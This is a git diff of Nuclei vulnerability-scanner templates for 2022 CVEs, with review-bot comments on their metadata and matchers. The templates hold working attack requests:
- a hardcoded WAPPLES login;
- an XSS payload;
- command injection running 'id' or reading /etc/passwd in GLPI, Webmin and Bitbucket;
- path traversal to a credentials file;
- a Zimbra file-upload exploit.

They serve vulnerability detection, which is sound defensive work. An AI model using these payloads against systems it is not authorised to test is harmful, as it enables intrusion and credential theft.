@@ -6,22 +6,33 @@ info: severity: critical description: | WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the WAPPLES Web Application Firewall. + remediation: | + Upgrade to a version of WAPPLES Web Application Firewall that does not contain hardcoded credentials or apply the vendor-provided patch to fix the vulnerability. reference: - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413 - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview - https://nvd.nist.gov/vuln/detail/CVE-2022-35413 + - https://www.pentasecurity.com/product/wapples/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-35413 cwe-id: CWE-798 + epss-score: 0.72077 + epss-percentile: 0.97989 + cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: pentasecurity + product: wapples shodan-query: http.title:"Intelligent WAPPLES" - verified: "true" - tags: cve,cve2022,wapples,firewall,default-login + tags: cve,cve2022,wapples,firewall,default-login,pentasecurity -requests: +http: - raw: - | POST /webapi/auth HTTP/1.1 @@ -30,12 +41,12 @@ requests: id={{username}}&password={{password}} - attack: pitchfork payloads: username: - systemi password: - db/wp.no1 + attack: pitchfork matchers-condition: and matchers: 
@@ -54,5 +65,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/06 +# digest: 4b0a00483046022100d7f00c85b2fc013d012ffbc1aface3dba29af2e1702bddfc66c8cbcdc3352788022100f55effaa808713faa5ad79ed9524db463132d5e31bdde0eba82aeaf965d12818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-35493.yaml b/nuclei-templates/CVE-2022/CVE-2022-35493.yaml index 8bc76eaa74..592dc3e926 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-35493.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-35493.yaml 
@@ -6,20 +6,32 @@ info: severity: medium description: | eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the website. + remediation: | + To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2022-35493 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-35493 cwe-id: CWE-79 + epss-score: 0.00157 + epss-percentile: 0.52174 + cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wrteam + product: eshop_-_ecommerce_\/_store_website shodan-query: http.html:"eShop - Multipurpose Ecommerce" - verified: "true" - tags: cve,cve2022,eshop,xss + tags: cve,cve2022,eshop,xss,wrteam -requests: +http: - method: GET path: - '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E' @@ -38,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4a0a0047304502202a6133499f5d377e9c10cce1deaaa1b80217ec22156f69d6175a9b958321a8d502210085ca957af87670643c6aed09bf0156a4c37519c0b98b77050dcbca0b85e8b814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-35653.yaml b/nuclei-templates/CVE-2022/CVE-2022-35653.yaml index e4f15b3e5a..022fbc4de6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-35653.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-35653.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35653 cwe-id: CWE-79 - epss-score: 0.00685 - epss-percentile: 0.77784 + epss-score: 0.00921 + epss-percentile: 0.82544 cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: verified: true @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bcc6a90986f149fabb6251387893b90150bf8bf348e8b2e9f302c19543f3a46e022100afd6b814a6b55dc423ce861b6ad493870cc0c7975f4da5eb4df6aa9d70dd923d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004b941fe0c29e3e5d82693bdb719e8d8bf0d20abade4a23f07f9a6f83c96c49e02201aeae2d265a2fa845153049b513dbfcbef5d317b1d289064871fdd40cc17f5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3578.yaml b/nuclei-templates/CVE-2022/CVE-2022-3578.yaml index e45ba3bf0c..f235f695f9 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3578.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3578.yaml 
@@ -6,20 +6,32 @@ info: severity: medium description: | WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. + remediation: | + Update WordPress ProfileGrid to version 5.1.1 or later to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345 - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3578 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3578 cwe-id: CWE-79 + epss-score: 0.00119 + epss-percentile: 0.45981 + cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp-plugin,wordpress,wpscan,cve,wp,xss,profilegrid,authenticated,cve2022 + verified: true + max-request: 2 + vendor: metagauss + product: profilegrid + framework: wordpress + tags: cve,cve2022,wp-plugin,wordpress,wpscan,wp,xss,profilegrid,authenticated,metagauss -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -27,20 +39,16 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?page=pm_add_group&id=">&tab")' condition: and - -# Enhanced by md on 2022/12/13 +# digest: 4b0a00483046022100dd995de30ddd471912eccf3b1c9747f357455709c02fff57a2ae72242063cfb6022100cf266425327b75e1aa894d7acfd50ae332dcda54311cd37251e9aecaed629c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-35914.yaml b/nuclei-templates/CVE-2022/CVE-2022-35914.yaml index 706f623aa0..00d4ea6869 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-35914.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-35914.yaml 
@@ -1,40 +1,30 @@ id: CVE-2022-35914 info: - name: GLPI <=10.0.2 - Remote Command Execution + name: GLPI - Remote Code Execution author: For3stCo1d severity: critical description: | - GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. - remediation: | - Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability. + /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection. reference: - https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914 - https://github.com/cosad3s/CVE-2022-35914-poc - - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed - https://nvd.nist.gov/vuln/detail/CVE-2022-35914 - - https://github.com/glpi-project/glpi/releases + - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-35914 cwe-id: CWE-74 - epss-score: 0.97399 - epss-percentile: 0.99914 - cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: glpi-project - product: glpi shodan-query: http.favicon.hash:"-1474875778" - tags: cve,cve2022,glpi,rce,kev,glpi-project + verified: "true" + tags: cve,cve2022,glpi,rce + variables: cmd: "cat+/etc/passwd" -http: +requests: - raw: - | POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 
@@ -54,4 +44,3 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e6859ca0826caafa4dc545ef1248adebca25f472c0e3188fb46cd23a4dd3bfc0022100ae9f408351c828c91bf99522202d215eabc284c86bcc9abb16c786e316ac0ebc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36446.yaml b/nuclei-templates/CVE-2022/CVE-2022-36446.yaml index 6bab79c95b..2e554033b9 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-36446.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-36446.yaml 
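Review bot: The new side of this hunk is a regression relative to the removed side: it drops `impact`, `remediation`, `epss-*`, `cpe`, `vendor`/`product`, `max-request`, the `kev` tag and the `# digest` trailer, turns `verified: true` back into the string `"true"`, and reverts `http:` to the legacy `requests:` key — the opposite direction from every other template in this commit. That pattern looks like an older copy of the file overwriting a newer one during the auto-update rather than an intentional edit. If it is intentional, the removed `kev` tag at least should be kept, since operators commonly filter on `-tags kev`, and the name should keep its version bound, `GLPI <=10.0.2 - Remote Code Execution`, so the affected range stays visible in scan output.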
@@ -1,20 +1,37 @@ id: CVE-2022-36446 info: - name: Webmin - Remote Code Execution (Authenticated) + name: Webmin <1.997 - Authenticated Remote Code Execution author: gy741 severity: critical description: | - Webmin before 1.997 is vulnerable to RCE exploits. an authenticated, remote attacker to perform command injection attacks. + Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system. + remediation: | + Upgrade Webmin to version 1.997 or later to mitigate this vulnerability. reference: - https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165 - https://www.exploit-db.com/exploits/50998 + - https://github.com/webmin/webmin/compare/1.996...1.997 - https://nvd.nist.gov/vuln/detail/CVE-2022-36446 + - http://packetstormsecurity.com/files/167894/Webmin-1.996-Remote-Code-Execution.html classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-36446 - tags: cve,cve2022,webmin,rce,authenticated + cwe-id: CWE-116 + epss-score: 0.97131 + epss-percentile: 0.99752 + cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: webmin + product: webmin + shodan-query: title:"Webmin" + tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb -requests: +http: - raw: - | POST /session_login.cgi HTTP/1.1 @@ -22,7 +39,6 @@ requests: Content-Type: application/x-www-form-urlencoded user={{username}}&pass={{password}} - - | POST /package-updates/update.cgi HTTP/1.1 Host: {{Hostname}} 
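Review bot: The new `description` ends with "gain full control over a compromised system without entering necessary credentials", which contradicts the new name `Webmin <1.997 - Authenticated Remote Code Execution` and the `POST /session_login.cgi` with `{{username}}`/`{{password}}` that the template itself starts with. The added vector `PR:N` (9.8) makes the same claim; if it is copied from NVD, say so in a comment such as `# cvss-metrics copied from NVD; the request path used here requires a valid Webmin login` rather than letting the description echo it. Suggest ending the description at `... An attacker can perform command injection attacks and thereby execute arbitrary commands on the host.`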
@@ -30,7 +46,6 @@ requests: mode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -45,3 +60,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100c00ba6d3cd5e3419f477ba4f1c6636a9a6527a59b9c3b11b6947953d18b99fff022100b6882779caab224e10ac09ce3d14a50090914c62c5248a1f2cc556ba1c3cb21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36537.yaml b/nuclei-templates/CVE-2022/CVE-2022-36537.yaml index d175442b95..95d822f1fc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-36537.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-36537.yaml 
@@ -6,26 +6,37 @@ info: severity: high description: | ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + The vulnerability can lead to the exposure of sensitive data, such as credentials or internal system information. + remediation: | + Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability. reference: - https://github.com/Malwareman007/CVE-2022-36537/ - https://tracker.zkoss.org/browse/ZK-5150 - https://nvd.nist.gov/vuln/detail/CVE-2022-36537 + - https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-zk-java-framework-rce-flaw/ + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-36537 cwe-id: CWE-200 + epss-score: 0.95859 + epss-percentile: 0.99401 + cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: zkoss + product: zk_framework shodan-query: http.title:"Server backup manager" - verified: "true" - tags: cve,cve2022,zk-framework,exposure,unauth + tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss -requests: +http: - raw: - | GET /login.zul HTTP/1.1 Host: {{Hostname}} - - | POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1 Host: {{Hostname}} @@ -40,16 +51,17 @@ requests: /WEB-INF/web.xml ------WebKitFormBoundaryCs6yB0zvpfSBbYEp-- - cookie-reuse: true matchers-condition: and matchers: - type: regex part: body regex: - - ".*" - - "((.|\n)*)welcome-file-list>" - - "xml version" - - "web-app" + - .* + - |- + ((.| + )*)welcome-file-list> + - xml version + - web-app condition: and - type: status 
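Review bot: The regex list under `matchers` now opens with a bare `.*`, which matches any body and therefore contributes nothing under `condition: and`; the trailing `welcome-file-list>` fragment on the next pattern suggests an opening-tag anchor was intended, so either restore the tag the pattern was meant to anchor on or delete the `.*` line so the matcher reads honestly. The `|-` block scalar for `((.|\n)*)welcome-file-list>` is equivalent to the old double-quoted form (both yield a literal newline in the alternation), so that part is fine. Adding `intrusive` is appropriate here, since the second request uploads a file through `/zkau/upload`; dropping `cookie-reuse: true` is only safe on nuclei versions where cookie reuse is the default for raw requests.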
@@ -63,5 +75,4 @@ requests: regex: - "dt:'(.*?)',cu:" internal: true - -# Enhanced by md on 2023/02/03 +# digest: 4a0a0047304502202cfa133f395dd683e1024de424de18fd3f12ff8a827f399357055226d7b8644c022100b0f39d19405888c00c5f79a616f6d8b3424a5f58b8ddfc5d37ad214eecdb917b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36553.yaml b/nuclei-templates/CVE-2022/CVE-2022-36553.yaml index e5300b39e6..02820f6e49 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-36553.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-36553.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-36553 cwe-id: CWE-77 - epss-score: 0.18047 - epss-percentile: 0.95653 + epss-score: 0.46383 + epss-percentile: 0.9713 cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: hwl-2511-ss_firmware fofa-query: title="index" && header="lighttpd/1.4.30" zoomeye-query: app:"Hytec Inter HWL-2511-SS" - tags: cve,cve2022,hytec,rce + tags: cve2022,cve,hytec,rce http: - raw: @@ -61,4 +61,4 @@ http: - "status_code == 200" - "contains(body_1, 'index')" condition: and -# digest: 4a0a00473045022100eca14458cebc532a203f1e35cfeaceb1fc6d35f3f3d3667f58552f27b3c1dd1302207aa08ecc7c55835b1f9f9dc8e84d9efd0795c1386599e680955e88bdd89c2e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eddd73199d20d259afa36f518385d2c6a5599db2a684123eb18b7465e35fadc702206d28ba1a993f628e7c45c6a2d82068bfb3c9c72e11e0ca8201a4ef233da38969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36642.yaml b/nuclei-templates/CVE-2022/CVE-2022-36642.yaml index 00cfd40bce..3e07bba2f3 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-36642.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-36642.yaml 
@@ -6,33 +6,41 @@ info: severity: critical description: | Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Omnia MPX. reference: - https://www.exploit-db.com/exploits/50996 - https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd - https://nvd.nist.gov/vuln/detail/CVE-2022-36642 + - https://www.telosalliance.com/radio-processing/audio-interfaces/omnia-mpx-node classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-36642 cwe-id: CWE-862 + epss-score: 0.68515 + epss-percentile: 0.97692 + cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: telosalliance + product: omnia_mpx_node_firmware shodan-query: http.title:"Omnia MPX Node | Login" - verified: "true" - tags: traversal,omnia,edb,cve,cve2022,lfi + tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance -requests: +http: - method: GET path: - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json" stop-at-first-match: true + matchers-condition: or matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: word part: body words: 
@@ -42,4 +50,7 @@ requests: - '"roleUser":' condition: and -# Enhanced by mp on 2023/01/15 + - type: regex + regex: + - "root:[x*]:0:0" +# digest: 4a0a0047304502204c76827983086116cc5105ff1864cbc06f821b5e018567ec977226dbf0a96123022100a99892b0c629088eeb4bd82f6815df89a5d0460b742da6fd5e24924e1a44cca0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36804.yaml b/nuclei-templates/CVE-2022/CVE-2022-36804.yaml index c2926b7872..6200beeadd 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-36804.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-36804.yaml 
@@ -1,66 +1,77 @@ id: CVE-2022-36804 info: - name: Atlassian Bitbucket Command Injection Vulnerability + name: Atlassian Bitbucket - Remote Command Injection author: DhiyaneshDk,tess,sullo severity: high description: | - Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. + Atlassian Bitbucket Server and Data Center is susceptible to remote command injection. Multiple API endpoints can allow an attacker with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request, thus making it possible to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. + remediation: | + Apply the latest security patches provided by Atlassian to mitigate the vulnerability. 
reference: - https://github.com/notdls/CVE-2022-36804 - - https://nvd.nist.gov/vuln/detail/CVE-2022-36804 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804 - https://jira.atlassian.com/browse/BSERV-13438 + - https://nvd.nist.gov/vuln/detail/CVE-2022-36804 + - http://packetstormsecurity.com/files/171453/Bitbucket-7.0.0-Remote-Command-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-36804 cwe-id: CWE-77 + epss-score: 0.97343 + epss-percentile: 0.99886 + cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* metadata: + max-request: 2 + vendor: atlassian + product: bitbucket shodan-query: http.component:"BitBucket" - tags: cve,cve2022,bitbucket,atlassian,kev - + tags: cve,cve2022,packetstorm,bitbucket,atlassian,kev variables: data: '{{rand_base(5)}}' -requests: +http: - raw: - | GET /rest/api/latest/repos HTTP/1.1 Host: {{Hostname}} - - | GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1 Host: {{Hostname}} + stop-at-first-match: true iterate-all: true + + matchers-condition: and + matchers: + - type: word + words: + - "com.atlassian.bitbucket.scm.CommandFailedException" + + - type: status + status: + - 500 + extractors: - type: json # type of the extractor - part: body name: key + internal: true json: - '.["values"] | .[] | .["project"] | .key' - internal: true - - - type: json # type of the extractor part: body + + - type: json name: slug + internal: true json: - '.["values"] | .[] | .slug' - internal: true + part: body - type: regex group: 1 regex: - 'uid=.*\(([a-z]+)\):' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "com.atlassian.bitbucket.scm.CommandFailedException" - - - type: status - status: - - 500 \ No newline at end of file +# digest: 
4a0a0047304502207f05b6fa75f5b18f40fc9cc67c652ba6c7601a227fe47e0bb3a03972933cabf30221009e3c19b251fb9154d5ade0ac96346cf96e5f9d320a6b1322a5a54fb104555e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36883.yaml b/nuclei-templates/CVE-2022/CVE-2022-36883.yaml new file mode 100644 index 0000000000..2be945f370 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-36883.yaml @@ -0,0 +1,27 @@ +id: CVE-2022-36883 +info: + name: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. + severity: high + author: c-sh0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-36883 + - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2022-36883 + cwe-id: CWE-862 + tags: cve,cve2022,jenkins,plugin,git,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '{{randstr}}' diff --git a/nuclei-templates/CVE-2022/CVE-2022-37042.yaml b/nuclei-templates/CVE-2022/CVE-2022-37042.yaml index 540cb67669..e66a2899cb 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-37042.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-37042.yaml 
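Review bot: `max-request: 2`, added to the metadata here, does not describe this template: the second raw request is driven by `iterate-all: true` over the `key` and `slug` extractors, so it is re-sent once per repository returned by `/rest/api/latest/repos`, each run executing `--exec=\`id\`` on the server, and the new `stop-at-first-match: true` only bounds that on a successful hit. A note such as `max-request: 2  # lower bound; iterate-all re-sends request 2 per repository` keeps the count honest, or the listing could be capped with `GET /rest/api/latest/repos?limit=1` since one readable repository is enough to prove the bug. It is also worth confirming how nuclei combines two extractor lists under `iterate-all`; if it iterates the cartesian product rather than index-aligned pairs, mismatched `{{key}}`/`{{slug}}` combinations will produce extra requests that can never raise the `CommandFailedException` the matcher looks for.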
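Review bot: The new template puts its entire description into `name` (`name: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows ...`) and has no `description` at all, so scan output will print a paragraph where a title belongs; move that sentence under `description: |` and use `name: Jenkins Git Plugin <=4.11.3 - Unauthenticated Build Trigger`. It is also the only template in this commit still on the legacy `requests:` key rather than `http:`, and it lacks the `metadata`/`max-request` lines and `# digest` trailer the rest of the commit adds. On detection, the matcher requires only a 200 and the echoed `{{randstr}}`; as far as I recall `/git/notifyCommit` reflects the supplied URL in its "No git jobs using repository" reply on any Jenkins with the Git plugin, patched or not, so a reflected token does not show that the request was accepted without the access token the SECURITY-284 fix introduced and this will likely flag fixed instances — a comment stating what response distinguishes 4.11.4+ should be added, or the matcher tightened.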
@@ -6,22 +6,31 @@ info: severity: critical description: | Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite. reference: - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/ - https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/ - https://github.com/vnhacker1337/CVE-2022-27925-PoC - https://nvd.nist.gov/vuln/detail/CVE-2022-37042 + - https://wiki.zimbra.com/wiki/Security_Center classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-37042 - cwe-id: CWE-287 + cwe-id: CWE-22 + epss-score: 0.97539 + epss-percentile: 0.99994 + cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: - fofa-query: app="zimbra-邮件系统" + max-request: 4 + vendor: zimbra + product: collaboration shodan-query: http.favicon.hash:"1624375939" + fofa-query: app="zimbra-邮件系统" tags: cve,cve2022,zimbra,rce,unauth,kev -requests: +http: - raw: - | POST {{path}} HTTP/1.1 @@ -30,7 +39,6 @@ requests: content-type: application/x-www-form-urlencoded {{hex_decode("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")}} - - | GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 Host: {{Hostname}} @@ -41,7 +49,6 @@ requests: - /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd stop-at-first-match: true - req-condition: true matchers: - type: dsl dsl: 
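Review bot: The added `cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*` pins a single version, while the description in the same hunk says both 8.8.15 and 9.0 ship the vulnerable mboximport functionality; if the CPE is meant to describe the affected range it should not be narrower than the description (a wildcard version component would cover 9.0). The same narrowing appears in CVE-2022-38463, whose new `cpe` names only `san_diego:patch_4` although its description says through Patch 4b and Patch 6. If the metadata generator can only emit one concrete CPE per template, a comment such as `# cpe lists one affected version; see description for the full range` would stop readers from treating the CPE as the affected range.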
